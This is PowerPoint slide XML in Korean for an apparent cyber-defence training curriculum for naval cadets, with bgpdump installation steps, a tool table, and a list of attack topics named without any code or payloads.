              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>원하는 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>본 예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 이동하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump_1.6.0-2_amd64.deb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 다운로드한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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우분투에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패키지를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드한 경로에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 들어간다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다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 설치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bgpdump_1.6.0-2_amd64.deb </a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4. bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 쳐서 잘 설치되었는지 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>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5"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44E85FC0-5988-40D3-8C94-2A8E8FB1FE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1" r="339" b="23775"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2960670"/>
            <a:ext cx="5214695" cy="3300981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D2DB8D-0520-4571-9BA4-79C619B56012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654260" y="2295367"/>
            <a:ext cx="4467849" cy="1133633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991284A-478D-4947-B442-937A0ED203C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect r="34208" b="14939"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349714" y="3585040"/>
            <a:ext cx="5283534" cy="178269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D746132-1C59-4018-A365-FDC5875DB994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262754" y="4506005"/>
            <a:ext cx="5457453" cy="780494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="그림 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB67231E-263B-4912-970C-EA6E9A018E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262754" y="5800703"/>
            <a:ext cx="5282272" cy="575147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22242426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136899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/Tool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 사용법</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715074636"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3933092" y="2813240"/>
          <a:ext cx="3807061" cy="1231519"/>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VI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>편집기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Gdb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Gdb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>디버거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27">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Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, Wireshark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r h="123127">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디어셈블러</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Objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>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5572868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951CB8F0-9E9F-44B8-B82A-2203ECCAAACB}"/>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6009F59-359C-43B6-9C77-A370A1E06AF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31FDC8BB-8FE6-454C-8CC3-C952A6A8557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AEC6B094-C31C-4309-B196-BBC6D91865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306822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2129392717"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4675952"/>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3" action="ppaction://hlinksldjump"/>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(Buffer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dirty="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(Heap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시스템 보안</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로그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0" action="ppaction://hlinksldjump"/>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SQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>인젝션</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(injection)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12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>증폭 공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(DNS Amplification)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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T16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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T17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소니피쳐스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 침해사고 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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T18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gdb</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사용법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17"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8"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934862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nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4677094"/>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서비스 종류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SSL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>통신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(Buffer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패킷</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ARP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(Heap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SYN Flooding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Ping </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Of Death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Slowloris Attack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SQL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인증 및 세션 관리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CSRF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9"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0"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69169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A3623B0D-630D-4C0C-99C3-D619003E7D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604134" y="2036618"/>
            <a:ext cx="5222694" cy="3877294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE81B3C-0693-4544-9264-957EFF2B86E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3705100" y="4304806"/>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36FD7FA-0972-477C-B597-72D6C45B67CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534862" y="6028764"/>
            <a:ext cx="5444836" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://kitribob.wiki/wiki/%EB%B0%B1%EB%8F%84%EC%9A%B0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="제2기 차세대 보안리더 양성 프로그램(Best of the Best)... - 한국정보기술연구원 'Best of the Best'">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EF3FB9-C729-4B6A-8333-0956DFF539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65" y="2945493"/>
            <a:ext cx="1482082" cy="1385947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="타원 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5D134A-0B4D-494F-8C49-F9BD261C73B9}"/>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41" name="타원 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4B6C07-6AD5-4A5D-B61C-4DB051517BAD}"/>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6" name="TextBox 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9A1D73-CFB7-4D50-BEED-3D8EF9C63818}"/>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7" name="직선 화살표 연결선 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD73CF56-CE85-4AC5-9721-048971D2CD4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41"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FCF514F-E568-48EA-AABA-A6248AFD0D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11756" y="2780465"/>
            <a:ext cx="2195299" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.kitribob.kr/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="직사각형 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06214921-FDF1-42E2-9571-A3D7834FB195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487849" y="2816671"/>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17634C5A-EF1B-4F55-BE15-B1EC577EA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5A3B2020-95D0-48DA-B02A-046EB54AB2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A6CFFB-E056-4675-B246-8194C46AA5A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1453E09-E646-42B3-BEB9-21673E2C1F8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 name="Picture 2" descr="차세대 보안리더 양성 프로그램 BoB 12기 모집, 예비 화이트햇 해커 모여라">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1DFB8C-E0B3-4ECE-99FD-E031384F3A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01590" y="2945493"/>
            <a:ext cx="3811125" cy="3216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498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사이버전 실습체계 구조</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해군 사관생도들의 사이버 방호 능력 강화 및 실전적인 정보보호 교육 가능한 실습체계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LMS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기반</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52F48F2-76E4-4392-B05B-844514945598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886741" y="1879088"/>
            <a:ext cx="6020951" cy="3903940"/>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252F91DC-5405-4EC8-AE12-0C46EE93971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5202EC0-5D60-4D08-A985-FD8B6B3870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14696F2-8D12-4420-BB91-E13BF17D5D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EC9F348-3D53-49CC-9882-F4B7B0F0E4D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848555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화면</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F454147E-C4CC-451C-B798-B26BAD0C9D2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8B5CF436-B505-4F5C-A576-624E286E9D9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F93007F-5094-4012-8110-869C50362D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72F05255-2D18-4CFA-A53B-F3CFD237CA9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54221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후 화면</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7" name="_x235110584">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00352E66-073D-4EB7-BDE6-130563806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085" y="1872205"/>
            <a:ext cx="7445829" cy="391770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그룹 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7131F2CB-AFBA-4A51-9F23-F657FC7877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4991ABF-AD5C-4491-A9CA-15E00F51A8D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41336A3B-BB23-499F-B5B8-D46E1B76050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5" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063BD911-4861-4B1F-B77D-7DF39DAFEB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849482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단위과제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066084"/>
            <a:ext cx="10630230" cy="1325564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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가상화 환경으로 구축되어 운용</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 네트워크 환경과 유사하게 구성</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진행에 필요한 네트워크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서버 및 기타 장비</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정보보호체계 등</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가상화 기반으로 구현되어 있음</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6880E82-60CF-498B-9AE3-1AE274B2FB0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370667" y="1690688"/>
            <a:ext cx="7450666" cy="3255023"/>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9B46836E-E1A5-47B8-89E8-2CB72D514A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13BA94D6-2736-4B2D-BFA1-7D38458717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E97079-4CF4-4FD6-9B13-9C00EFE3262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AE9E3E2E-956E-415E-A828-C616E89D73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575216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시나리오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30740"/>
            <a:ext cx="10630230" cy="96090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해당 환경에서 시나리오에 기반한 연속적인 침해행위들을 발생</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indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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교육생들이 해당 침해행위들에 대한 대응과정</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실습과제</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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E4F6BF-6CAF-4148-A75E-D301FE116E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2565071" y="1690688"/>
            <a:ext cx="7061858" cy="3599854"/>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7C1A2D4D-878E-4F50-BBBD-889B560CA330}"/>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6878C41-5A15-4884-913D-82DED9AE56B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20C8C3B-A15F-4EE0-B101-6C1B2511B35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822FB78-94E5-4975-9AB9-21A1E20523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29438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가상의 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자동화 도구를 활용하여 정보체계 취약점에 대한 실시간 공격과 방어과정을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공격</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방어 실습체계</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3BBEB8-2000-4F7A-9D5C-B527DC3B225E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327854" y="1618163"/>
            <a:ext cx="7421659" cy="3809879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
